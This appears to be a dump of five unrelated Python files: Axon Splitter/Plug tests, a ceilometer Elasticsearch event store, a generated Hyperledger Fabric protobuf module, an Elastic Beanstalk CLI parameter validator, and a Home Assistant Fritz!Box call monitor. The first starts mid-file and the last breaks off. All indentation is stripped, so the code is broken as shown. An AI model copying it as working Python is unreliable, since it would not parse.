for j in xrange(1,10):
execute.next()
for i in xrange(1,40):
execute.next()
# verify that the data has made it to the targets
for i in xrange(1,5):
self.assert_(target1.dataReady("inbox"))
self.assert_(target1.dataReady("control"))
self.assert_(i == target1.recv("inbox"))
self.assert_(10+i == target1.recv("control"))
self.assert_(target2.dataReady("inbox"))
self.assert_(target2.dataReady("control"))
self.assert_(i == target2.recv("inbox"))
self.assert_(10+i == target2.recv("control"))
for i in xrange(5,10):
self.assert_(target1.dataReady("inbox"))
self.assert_(target1.dataReady("control"))
self.assert_(i == target1.recv("inbox"))
self.assert_(10+i == target1.recv("control"))
self.assert_(not target2.dataReady("inbox"))
self.assert_(not target2.dataReady("control"))
# verify there is nothing left
self.assert_(not target1.dataReady("inbox"))
self.assert_(not target1.dataReady("control"))
self.assert_(not target2.dataReady("inbox"))
self.assert_(not target2.dataReady("control"))
class Plug_Tests(unittest.TestCase):
def test_PluggingInAndTxfer(self):
"""Plug instantiated with splitter and component and passes data through to component."""
Axon.Scheduler.scheduler.run = Axon.Scheduler.scheduler()
splitter = Splitter()
splitter.activate()
target = DummyComponent()
plug = Plug(splitter, target).activate()
execute = Axon.Scheduler.scheduler.run.main()
for i in xrange(1,1000):
execute.next()
#pass some data in
for i in xrange(1,10):
splitter._deliver(i, "inbox")
splitter._deliver(10+i, "control")
for i in xrange(1,100):
execute.next()
# verify it reached the target
self.assert_(target.inboxlog == range(1,10))
self.assert_(target.controllog == range(11,20))
def test_Unplugging(self):
"""Plug will unplug and shutdown when child component dies."""
Axon.Scheduler.scheduler.run = Axon.Scheduler.scheduler()
splitter = Splitter()
splitter.activate()
target = DummyComponent()
plug = Plug(splitter, target).activate()
execute = Axon.Scheduler.scheduler.run.main()
for i in xrange(1,100):
execute.next()
#send shutdown msg
msg = producerFinished()
target._deliver(msg, "control")
for i in xrange(1,100):
execute.next()
# verify it reached the target
self.assert_(target.controllog == [msg])
# verify the plug has shutdown
self.assert_(plug._isStopped())
# verify the plug has no linkages
self.assert_(not plug.postoffice.linkages)
# verify that splitter only has outboxes "outbox" and "signal" now
self.assert_( len(splitter.outboxes) == 2)
self.assert_( "outbox" in splitter.outboxes)
self.assert_( "signal" in splitter.outboxes)
if __name__=='__main__':
unittest.main()
|
|
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import operator
import elasticsearch as es
from elasticsearch import helpers
from oslo_log import log
from oslo_utils import netutils
from oslo_utils import timeutils
import six
from ceilometer.event.storage import base
from ceilometer.event.storage import models
from ceilometer.i18n import _LE, _LI
from ceilometer import storage
from ceilometer import utils
LOG = log.getLogger(__name__)
AVAILABLE_CAPABILITIES = {
'events': {'query': {'simple': True}},
}
AVAILABLE_STORAGE_CAPABILITIES = {
'storage': {'production_ready': True},
}
class Connection(base.Connection):
"""Put the event data into an ElasticSearch db.
Events in ElasticSearch are indexed by day and stored by event_type.
An example document::
{"_index":"events_2014-10-21",
"_type":"event_type0",
"_id":"dc90e464-65ab-4a5d-bf66-ecb956b5d779",
"_score":1.0,
"_source":{"timestamp": "2014-10-21T20:02:09.274797"
"traits": {"id4_0": "2014-10-21T20:02:09.274797",
"id3_0": 0.7510790937279408,
"id2_0": 5,
"id1_0": "18c97ba1-3b74-441a-b948-a702a30cbce2"}
}
}
"""
CAPABILITIES = utils.update_nested(base.Connection.CAPABILITIES,
AVAILABLE_CAPABILITIES)
STORAGE_CAPABILITIES = utils.update_nested(
base.Connection.STORAGE_CAPABILITIES,
AVAILABLE_STORAGE_CAPABILITIES,
)
index_name = 'events'
# NOTE(gordc): mainly for testing; data is not searchable immediately
# after a write, only after the periodic index refresh.
_refresh_on_write = False
def __init__(self, url):
url_split = netutils.urlsplit(url)
self.conn = es.Elasticsearch(url_split.netloc)
def upgrade(self):
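# Install an index template so each per-day event index stores the
# _timestamp field and maps traits as a nested type, which the nested
# trait queries built in _make_dsl_from_filter rely on.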
iclient = es.client.IndicesClient(self.conn)
ts_template = {
'template': '*',
'mappings': {'_default_':
{'_timestamp': {'enabled': True,
'store': True},
'properties': {'traits': {'type': 'nested'}}}}}
iclient.put_template(name='enable_timestamp', body=ts_template)
def record_events(self, events):
def _build_bulk_index(event_list):
for ev in event_list:
traits = {t.name: t.value for t in ev.traits}
yield {'_op_type': 'create',
'_index': '%s_%s' % (self.index_name,
ev.generated.date().isoformat()),
'_type': ev.event_type,
'_id': ev.message_id,
'_source': {'timestamp': ev.generated.isoformat(),
'traits': traits,
'raw': ev.raw}}
error = None
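# Stream the bulk index request; a 409 status means the event was already
# recorded (duplicate message_id) and is only logged, while any other
# failure is remembered and re-raised once the whole batch has been tried.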
for ok, result in helpers.streaming_bulk(
self.conn, _build_bulk_index(events)):
if not ok:
__, result = result.popitem()
if result['status'] == 409:
LOG.info(_LI('Duplicate event detected, skipping it: %s')
% result)
else:
LOG.exception(_LE('Failed to record event: %s') % result)
error = storage.StorageUnknownWriteError(result)
if self._refresh_on_write:
self.conn.indices.refresh(index='%s_*' % self.index_name)
while self.conn.cluster.pending_tasks(local=True)['tasks']:
pass
if error:
raise error
def _make_dsl_from_filter(self, indices, ev_filter):
q_args = {}
filters = []
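# Indices are named '<index_name>_<YYYY-MM-DD>' (one per day), so trim the
# index list to the requested timestamp window before building the query.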
if ev_filter.start_timestamp:
filters.append({'range': {'timestamp':
{'ge': ev_filter.start_timestamp.isoformat()}}})
while indices[0] < (
'%s_%s' % (self.index_name,
ev_filter.start_timestamp.date().isoformat())):
del indices[0]
if ev_filter.end_timestamp:
filters.append({'range': {'timestamp':
{'le': ev_filter.end_timestamp.isoformat()}}})
while indices[-1] > (
'%s_%s' % (self.index_name,
ev_filter.end_timestamp.date().isoformat())):
del indices[-1]
q_args['index'] = indices
if ev_filter.event_type:
q_args['doc_type'] = ev_filter.event_type
if ev_filter.message_id:
filters.append({'term': {'_id': ev_filter.message_id}})
if ev_filter.traits_filter:
trait_filters = []
for t_filter in ev_filter.traits_filter:
value = None
for val_type in ['integer', 'string', 'float', 'datetime']:
if t_filter.get(val_type):
value = t_filter.get(val_type)
if isinstance(value, six.string_types):
value = value.lower()
elif isinstance(value, datetime.datetime):
value = value.isoformat()
break
if t_filter.get('op') in ['gt', 'ge', 'lt', 'le']:
op = (t_filter.get('op').replace('ge', 'gte')
.replace('le', 'lte'))
trait_filters.append(
{'range': {t_filter['key']: {op: value}}})
else:
tf = {"query": {"query_string": {
"query": "%s: \"%s\"" % (t_filter['key'], value)}}}
if t_filter.get('op') == 'ne':
tf = {"not": tf}
trait_filters.append(tf)
filters.append(
{'nested': {'path': 'traits', 'query': {'filtered': {
'filter': {'bool': {'must': trait_filters}}}}}})
q_args['body'] = {'query': {'filtered':
{'filter': {'bool': {'must': filters}}}}}
return q_args
def get_events(self, event_filter):
iclient = es.client.IndicesClient(self.conn)
indices = iclient.get_mapping('%s_*' % self.index_name).keys()
if indices:
filter_args = self._make_dsl_from_filter(indices, event_filter)
results = self.conn.search(fields=['_id', 'timestamp',
'_type', '_source'],
sort='timestamp:asc',
**filter_args)
trait_mappings = {}
for record in results['hits']['hits']:
trait_list = []
if not record['_type'] in trait_mappings:
trait_mappings[record['_type']] = list(
self.get_trait_types(record['_type']))
for key in record['_source']['traits'].keys():
value = record['_source']['traits'][key]
for t_map in trait_mappings[record['_type']]:
if t_map['name'] == key:
dtype = t_map['data_type']
break
else:
dtype = models.Trait.TEXT_TYPE
trait_list.append(models.Trait(
name=key, dtype=dtype,
value=models.Trait.convert_value(dtype, value)))
gen_ts = timeutils.normalize_time(timeutils.parse_isotime(
record['_source']['timestamp']))
yield models.Event(message_id=record['_id'],
event_type=record['_type'],
generated=gen_ts,
traits=sorted(
trait_list,
key=operator.attrgetter('dtype')),
raw=record['_source']['raw'])
def get_event_types(self):
iclient = es.client.IndicesClient(self.conn)
es_mappings = iclient.get_mapping('%s_*' % self.index_name)
seen_types = set()
for index in es_mappings.keys():
for ev_type in es_mappings[index]['mappings'].keys():
seen_types.add(ev_type)
# TODO(gordc): tests assume sorted ordering but backends are not
# explicitly ordered.
# NOTE: _default_ is a type that appears in all mappings but is not a
# real 'type', so it is discarded from the results.
seen_types.discard('_default_')
return sorted(list(seen_types))
@staticmethod
def _remap_es_types(d_type):
if d_type == 'string':
d_type = 'text'
elif d_type == 'long':
d_type = 'int'
elif d_type == 'double':
d_type = 'float'
elif d_type == 'date' or d_type == 'date_time':
d_type = 'datetime'
return d_type
def get_trait_types(self, event_type):
iclient = es.client.IndicesClient(self.conn)
es_mappings = iclient.get_mapping('%s_*' % self.index_name)
seen_types = []
for index in es_mappings.keys():
# if event_type exists in index and has traits
if (es_mappings[index]['mappings'].get(event_type) and
es_mappings[index]['mappings'][event_type]['properties']
['traits'].get('properties')):
for t_type in (es_mappings[index]['mappings'][event_type]
['properties']['traits']['properties'].keys()):
d_type = (es_mappings[index]['mappings'][event_type]
['properties']['traits']['properties']
[t_type]['type'])
d_type = models.Trait.get_type_by_name(
self._remap_es_types(d_type))
if (t_type, d_type) not in seen_types:
yield {'name': t_type, 'data_type': d_type}
seen_types.append((t_type, d_type))
def get_traits(self, event_type, trait_type=None):
t_types = dict((res['name'], res['data_type'])
for res in self.get_trait_types(event_type))
if not t_types or (trait_type and trait_type not in t_types.keys()):
return
result = self.conn.search('%s_*' % self.index_name, event_type)
for ev in result['hits']['hits']:
if trait_type and ev['_source']['traits'].get(trait_type):
yield models.Trait(
name=trait_type,
dtype=t_types[trait_type],
value=models.Trait.convert_value(
t_types[trait_type],
ev['_source']['traits'][trait_type]))
else:
for trait in ev['_source']['traits'].keys():
yield models.Trait(
name=trait,
dtype=t_types[trait],
value=models.Trait.convert_value(
t_types[trait],
ev['_source']['traits'][trait]))
|
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: msp/msp_principal.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='msp/msp_principal.proto',
package='common',
syntax='proto3',
serialized_pb=_b('\n\x17msp/msp_principal.proto\x12\x06\x63ommon\"\xa9\x01\n\x0cMSPPrincipal\x12\x45\n\x18principal_classification\x18\x01 \x01(\x0e\x32#.common.MSPPrincipal.Classification\x12\x11\n\tprincipal\x18\x02 \x01(\x0c\"?\n\x0e\x43lassification\x12\x08\n\x04ROLE\x10\x00\x12\x15\n\x11ORGANIZATION_UNIT\x10\x01\x12\x0c\n\x08IDENTITY\x10\x02\"q\n\x10OrganizationUnit\x12\x16\n\x0emsp_identifier\x18\x01 \x01(\t\x12&\n\x1eorganizational_unit_identifier\x18\x02 \x01(\t\x12\x1d\n\x15\x63\x65rtifiers_identifier\x18\x03 \x01(\x0c\"r\n\x07MSPRole\x12\x16\n\x0emsp_identifier\x18\x01 \x01(\t\x12)\n\x04role\x18\x02 \x01(\x0e\x32\x1b.common.MSPRole.MSPRoleType\"$\n\x0bMSPRoleType\x12\n\n\x06MEMBER\x10\x00\x12\t\n\x05\x41\x44MIN\x10\x01\x42P\n$org.hyperledger.fabric.protos.commonZ(github.com/hyperledger/fabric/protos/mspb\x06proto3')
)
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_MSPPRINCIPAL_CLASSIFICATION = _descriptor.EnumDescriptor(
name='Classification',
full_name='common.MSPPrincipal.Classification',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='ROLE', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ORGANIZATION_UNIT', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='IDENTITY', index=2, number=2,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=142,
serialized_end=205,
)
_sym_db.RegisterEnumDescriptor(_MSPPRINCIPAL_CLASSIFICATION)
_MSPROLE_MSPROLETYPE = _descriptor.EnumDescriptor(
name='MSPRoleType',
full_name='common.MSPRole.MSPRoleType',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='MEMBER', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ADMIN', index=1, number=1,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=400,
serialized_end=436,
)
_sym_db.RegisterEnumDescriptor(_MSPROLE_MSPROLETYPE)
_MSPPRINCIPAL = _descriptor.Descriptor(
name='MSPPrincipal',
full_name='common.MSPPrincipal',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='principal_classification', full_name='common.MSPPrincipal.principal_classification', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='principal', full_name='common.MSPPrincipal.principal', index=1,
number=2, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=_b(""),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
_MSPPRINCIPAL_CLASSIFICATION,
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=36,
serialized_end=205,
)
_ORGANIZATIONUNIT = _descriptor.Descriptor(
name='OrganizationUnit',
full_name='common.OrganizationUnit',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='msp_identifier', full_name='common.OrganizationUnit.msp_identifier', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='organizational_unit_identifier', full_name='common.OrganizationUnit.organizational_unit_identifier', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='certifiers_identifier', full_name='common.OrganizationUnit.certifiers_identifier', index=2,
number=3, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=_b(""),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=207,
serialized_end=320,
)
_MSPROLE = _descriptor.Descriptor(
name='MSPRole',
full_name='common.MSPRole',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='msp_identifier', full_name='common.MSPRole.msp_identifier', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='role', full_name='common.MSPRole.role', index=1,
number=2, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
_MSPROLE_MSPROLETYPE,
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=322,
serialized_end=436,
)
_MSPPRINCIPAL.fields_by_name['principal_classification'].enum_type = _MSPPRINCIPAL_CLASSIFICATION
_MSPPRINCIPAL_CLASSIFICATION.containing_type = _MSPPRINCIPAL
_MSPROLE.fields_by_name['role'].enum_type = _MSPROLE_MSPROLETYPE
_MSPROLE_MSPROLETYPE.containing_type = _MSPROLE
DESCRIPTOR.message_types_by_name['MSPPrincipal'] = _MSPPRINCIPAL
DESCRIPTOR.message_types_by_name['OrganizationUnit'] = _ORGANIZATIONUNIT
DESCRIPTOR.message_types_by_name['MSPRole'] = _MSPROLE
MSPPrincipal = _reflection.GeneratedProtocolMessageType('MSPPrincipal', (_message.Message,), dict(
DESCRIPTOR = _MSPPRINCIPAL,
__module__ = 'msp.msp_principal_pb2'
# @@protoc_insertion_point(class_scope:common.MSPPrincipal)
))
_sym_db.RegisterMessage(MSPPrincipal)
OrganizationUnit = _reflection.GeneratedProtocolMessageType('OrganizationUnit', (_message.Message,), dict(
DESCRIPTOR = _ORGANIZATIONUNIT,
__module__ = 'msp.msp_principal_pb2'
# @@protoc_insertion_point(class_scope:common.OrganizationUnit)
))
_sym_db.RegisterMessage(OrganizationUnit)
MSPRole = _reflection.GeneratedProtocolMessageType('MSPRole', (_message.Message,), dict(
DESCRIPTOR = _MSPROLE,
__module__ = 'msp.msp_principal_pb2'
# @@protoc_insertion_point(class_scope:common.MSPRole)
))
_sym_db.RegisterMessage(MSPRole)
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('\n$org.hyperledger.fabric.protos.commonZ(github.com/hyperledger/fabric/protos/msp'))
try:
# THESE ELEMENTS WILL BE DEPRECATED.
# Please use the generated *_pb2_grpc.py files instead.
import grpc
from grpc.framework.common import cardinality
from grpc.framework.interfaces.face import utilities as face_utilities
from grpc.beta import implementations as beta_implementations
from grpc.beta import interfaces as beta_interfaces
except ImportError:
pass
# @@protoc_insertion_point(module_scope)
|
|
#!/usr/bin/env python
#==============================================================================
# Copyright 2012 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Amazon Software License (the "License"). You may not use
# this file except in compliance with the License. A copy of the License is
# located at
#
# http://aws.amazon.com/asl/
#
# or in the "license" file accompanying this file. This file is distributed on
# an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, express or
# implied. See the License for the specific language governing permissions
# and limitations under the License.
#==============================================================================
import logging
import os
from scli.constants import EbLocalDir, OptionSettingFile, ParameterName, \
ParameterSource, ServiceRegion, ServiceDefault
from scli.resources import ValidationMessage
from scli.exception import ValidationError
log = logging.getLogger("cli")
class Parameter(object):
'''
Stores a parameter value, with its name and source, used by operations.
'''
def __init__(self, name, value, source):
self._name = name
self._source = source
self._value = value
@property
def name(self):
return self._name
@property
def value(self):
return self._value
@property
def source(self):
return self._source
@name.setter
def name(self, name):
self._name = name
@value.setter
def value(self, value):
self._value = value
@source.setter
def source(self, source):
self._source = source
class ParameterPool(object):
'''
A collection of runtime parameters.
'''
def __init__(self):
self._pool = dict()
@property
def command(self): # one pool can have at most one command
return (self._pool[ParameterName.Command].value, self._pool[ParameterName.SubCommand].value)
@property
def parameter_names(self):
params = set()
for param_name in list(self._pool.keys()):
params.add(param_name)
return params
@property
def parameters(self):
return self._pool
def __getitem__(self, name):
return self._pool[name]
def get(self, name):
return self._pool[name]
def get_value(self, name, none_if_not_exist = True):
try:
return self._pool[name].value
except KeyError:
if none_if_not_exist:
return None
else:
raise
def get_source(self, name):
return self._pool[name].source
def put(self, param, force = False):
'''
Add a new parameter to the pool.
If the parameter is not yet in the pool, or force is True, it is always
added/updated. Otherwise it only replaces the existing entry when its
source has equal or higher priority than the one already in the pool.
'''
if not isinstance(param, Parameter):
raise AttributeError("Cannot add item that's not instance of Parameter.")
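# Accept the new parameter when it is not yet in the pool, when force is
# set, or when its source has equal or higher priority than the stored one.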
if param.name not in self._pool \
or force\
or param.source == self._pool[param.name].source \
or ParameterSource.is_ahead(param.source, self._pool[param.name].source):
self._pool[param.name] = param
def update(self, name, value = None, source = None):
if name in self._pool:
if value is not None:
self._pool[name].value = value
if source is not None:
self._pool[name].source = source
else:
self.put(Parameter(name, value, source))
def has(self, name):
return name in self._pool
def remove(self, name):
if self.has(name):
del self._pool[name]
def validate(self, source = None):
validator = ParameterValidator()
validator.validate(self, source)
class ParameterValidator(object):
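# Class-level registry mapping parameter names to their validation
# callables; it is populated when an instance is constructed.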
_validators = dict()
def __init__(self):
self._validators[ParameterName.ApplicationName] = \
self.validate_application_name
self._validators[ParameterName.ApplicationVersionName] = \
self.validate_application_version_name
self._validators[ParameterName.EnvironmentName] = \
self.validate_environment_name
self._validators[ParameterName.SolutionStack] = self.validate_solution_stack
self._validators[ParameterName.ServiceEndpoint] = self.validate_endpoint
self._validators[ParameterName.Region] = self.validate_region
#-------------------------------
# Helper method
#-------------------------------
@classmethod
def validate_alphanumeric(cls, value, min_size = None, max_size = None):
if value is not None:
size = len(value)
if min_size is not None and size < min_size:
return False
elif max_size is not None and size > max_size:
return False
else:
return value.isalnum()
else:
return False
@classmethod
def validate_RDS_password(cls, value, min_size = None, max_size = None):
if value is not None:
size = len(value)
if min_size is not None and size < min_size:
return False
elif max_size is not None and size > max_size:
return False
else:
return not("/" in value or "\\" in value or "@" in value)
else:
return False
@classmethod
def _validate_string(cls, value, name):
if len(value) < 1:
raise ValidationError(ValidationMessage.EmptyString.format(name))
@classmethod
def _validate_integer(cls, param, max_value = None, min_value = None):
try:
value = int(param)
except ValueError:
raise ValidationError(ValidationMessage.InvalidNumber.format(param))
if max_value is not None and max_value < value:
raise ValidationError(ValidationMessage.NumberTooBig.format(value))
if min_value is not None and min_value > value:
raise ValidationError(ValidationMessage.NumberTooSmall.format(value))
#-------------------------------
# Validation method
#-------------------------------
@classmethod
def validate(cls, parameter_pool, source = None):
''' Validate the parameters in the pool whose source equals the specified source.
When source is None, validate all parameters. '''
for name, parameter in list(parameter_pool.parameters.items()):
if source is None or parameter.source == source:
try:
cls._validators[name](parameter_pool, source)
except KeyError:
continue # skip parameters that have no validator
@classmethod
def validate_application_name(cls, parameter_pool, source):
if parameter_pool.has(ParameterName.ApplicationName):
name = parameter_pool.get_value(ParameterName.ApplicationName)
cls._validate_string(name, ParameterName.ApplicationName)
@classmethod
def validate_application_version_name(cls, parameter_pool, source):
if parameter_pool.has(ParameterName.ApplicationVersionName):
name = parameter_pool.get_value(ParameterName.ApplicationVersionName)
cls._validate_string(name, ParameterName.ApplicationVersionName)
@classmethod
def validate_environment_name(cls, parameter_pool, source):
if parameter_pool.has(ParameterName.EnvironmentName):
name = parameter_pool.get_value(ParameterName.EnvironmentName)
cls._validate_string(name, ParameterName.EnvironmentName)
@classmethod
def validate_solution_stack(cls, parameter_pool, source):
if parameter_pool.has(ParameterName.SolutionStack):
name = parameter_pool.get_value(ParameterName.SolutionStack)
cls._validate_string(name, ParameterName.SolutionStack)
@classmethod
def validate_region(cls, parameter_pool, source):
if (parameter_pool.has(ParameterName.Region)):
region = parameter_pool.get_value(ParameterName.Region)
if region not in ServiceRegion:
raise ValidationError(ValidationMessage.InvalidRegion.\
format(region))
@classmethod
def validate_endpoint(cls, parameter_pool, source):
if parameter_pool.has(ParameterName.ServiceEndpoint):
name = parameter_pool.get_value(ParameterName.ServiceEndpoint)
cls._validate_string(name, ParameterName.ServiceEndpoint)
class DefaultParameterValue(object):
@classmethod
def fill_default(cls, parameter_pool):
cls.fill_version_name(parameter_pool)
cls.fill_option_setting_file_name(parameter_pool)
cls.fill_connection_timeout(parameter_pool)
cls.fill_wait_timeout(parameter_pool)
cls.fill_update_timeout(parameter_pool)
cls.fill_poll_delay(parameter_pool)
@classmethod
def fill_version_name(cls, parameter_pool):
parameter_pool.put(Parameter(ParameterName.ApplicationVersionName,
ServiceDefault.DEFAULT_VERSION_NAME,
ParameterSource.Default
))
@classmethod
def fill_option_setting_file_name(cls, parameter_pool):
path = os.path.join(EbLocalDir.Path, OptionSettingFile.Name)
parameter_pool.put(Parameter(ParameterName.OptionSettingFile,
path,
ParameterSource.Default
))
@classmethod
def fill_connection_timeout(cls, parameter_pool):
parameter_pool.put(Parameter(ParameterName.ServiceConnectionTimeout,
ServiceDefault.CONNECTION_TIMEOUT_IN_SEC,
ParameterSource.Default
))
@classmethod
def fill_wait_timeout(cls, parameter_pool):
parameter_pool.put(Parameter(ParameterName.WaitForFinishTimeout,
ServiceDefault.WAIT_TIMEOUT_IN_SEC,
ParameterSource.Default
))
@classmethod
def fill_update_timeout(cls, parameter_pool):
parameter_pool.put(Parameter(ParameterName.WaitForUpdateTimeout,
ServiceDefault.UPDATE_TIMEOUT_IN_SEC,
ParameterSource.Default
))
@classmethod
def fill_poll_delay(cls, parameter_pool):
parameter_pool.put(Parameter(ParameterName.PollDelay,
ServiceDefault.POLL_DELAY_IN_SEC,
ParameterSource.Default
))
|
|
"""
A sensor to monitor incoming and outgoing phone calls on a Fritz!Box router.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sensor.fritzbox_callmonitor/
"""
import logging
import socket
import threading
import datetime
import time
import re
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (CONF_HOST, CONF_PORT, CONF_NAME,
CONF_PASSWORD, CONF_USERNAME,
EVENT_HOMEASSISTANT_STOP)
from homeassistant.helpers.entity import Entity
import homeassistant.helpers.config_validation as cv
from homeassistant.util import Throttle
REQUIREMENTS = ['fritzconnection==0.6.5']
_LOGGER = logging.getLogger(__name__)
CONF_PHONEBOOK = 'phonebook'
CONF_PREFIXES = 'prefixes'
DEFAULT_HOST = '169.254.1.1' # IP valid for all Fritz!Box routers
DEFAULT_NAME = 'Phone'
DEFAULT_PORT = 1012
INTERVAL_RECONNECT = 60
VALUE_CALL = 'dialing'
VALUE_CONNECT = 'talking'
VALUE_DEFAULT = 'idle'
VALUE_DISCONNECT = 'idle'
VALUE_RING = 'ringing'
# Return cached results if the phonebook was downloaded less than this time ago.
MIN_TIME_PHONEBOOK_UPDATE = datetime.timedelta(hours=6)
SCAN_INTERVAL = datetime.timedelta(hours=3)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_HOST, default=DEFAULT_HOST): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
vol.Optional(CONF_PASSWORD, default='admin'): cv.string,
vol.Optional(CONF_USERNAME, default=''): cv.string,
vol.Optional(CONF_PHONEBOOK, default=0): cv.positive_int,
vol.Optional(CONF_PREFIXES, default=[]):
vol.All(cv.ensure_list, [cv.string])
})
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up Fritz!Box call monitor sensor platform."""
name = config.get(CONF_NAME)
host = config.get(CONF_HOST)
port = config.get(CONF_PORT)
username = config.get(CONF_USERNAME)
password = config.get(CONF_PASSWORD)
phonebook_id = config.get(CONF_PHONEBOOK)
prefixes = config.get(CONF_PREFIXES)
try:
phonebook = FritzBoxPhonebook(
host=host, port=port, username=username, password=password,
phonebook_id=phonebook_id, prefixes=prefixes)
except: # noqa: E722 pylint: disable=bare-except
phonebook = None
_LOGGER.warning("Phonebook with ID %s not found on Fritz!Box",
phonebook_id)
sensor = FritzBoxCallSensor(name=name, phonebook=phonebook)
add_entities([sensor])
monitor = FritzBoxCallMonitor(host=host, port=port, sensor=sensor)
monitor.connect()
def _stop_listener(_event):
monitor.stopped.set()
hass.bus.listen_once(
EVENT_HOMEASSISTANT_STOP,
_stop_listener
)
return monitor.sock is not None
class FritzBoxCallSensor(Entity):
"""Implementation of a Fritz!Box call monitor."""
def __init__(self, name, phonebook):
"""Initialize the sensor."""
self._state = VALUE_DEFAULT
self._attributes = {}
self._name = name
self.phonebook = phonebook
def set_state(self, state):
"""Set the state."""
self._state = state
def set_attributes(self, attributes):
"""Set the state attributes."""
self._attributes = attributes
@property
def should_poll(self):
"""Only poll to update phonebook, if defined."""
return self.phonebook is not None
@property
def state(self):
"""Return the state of the device."""
return self._state
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def device_state_attributes(self):
"""Return the state attributes."""
return self._attributes
def number_to_name(self, number):
"""Return a name for a given phone number."""
if self.phonebook is None:
return 'unknown'
return self.phonebook.get_name(number)
def update(self):
"""Update the phonebook if it is defined."""
if self.phonebook is not None:
self.phonebook.update_phonebook()
class FritzBoxCallMonitor:
"""Event listener to monitor calls on the Fritz!Box."""
def __init__(self, host, port, sensor):
"""Initialize Fritz!Box monitor instance."""
self.host = host
self.port = port
self.sock = None
self._sensor = sensor
self.stopped = threading.Event()
def connect(self):
"""Connect to the Fritz!Box."""
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(10)
try:
self.sock.connect((self.host, self.port))
threading.Thread(target=self._listen).start()
except socket.error as err:
self.sock = None
_LOGGER.error("Cannot connect to %s on port %s: %s",
self.host, self.port, err)
def _listen(self):
"""Listen to incoming or outgoing calls."""
while not self.stopped.isSet():
try:
response = self.sock.recv(2048)
except socket.timeout:
# if no response after 10 seconds, just recv again
continue
response = str(response, "utf-8")
if not response:
# if the response is empty, the connection has been lost.
# try to reconnect
self.sock = None
while self.sock is None:
self.connect()
time.sleep(INTERVAL_RECONNECT)
else:
line = response.split("\n", 1)[0]
self._parse(line)
time.sleep(1)
def _parse(self, line):
"""Parse the call information and set the sensor states."""
line = line.split(";")
df_in = "%d.%m.%y %H:%M:%S"
df_out = "%Y-%m-%dT%H:%M:%S"
isotime = datetime.datetime.strptime(line[0], df_in).strftime(df_out)
if line[1] == "RING":
self._sensor.set_state(VALUE_RING)
att = {"type": "incoming",
"from": line[3],
"to": line[4],
"device": line[5],
"initiated": isotime}
att["from_name"] = self._sensor.number_to_name(att["from"])
self._sensor.set_attributes(att)
elif line[1] == "CALL":
self._sensor.set_state(VALUE_CALL)
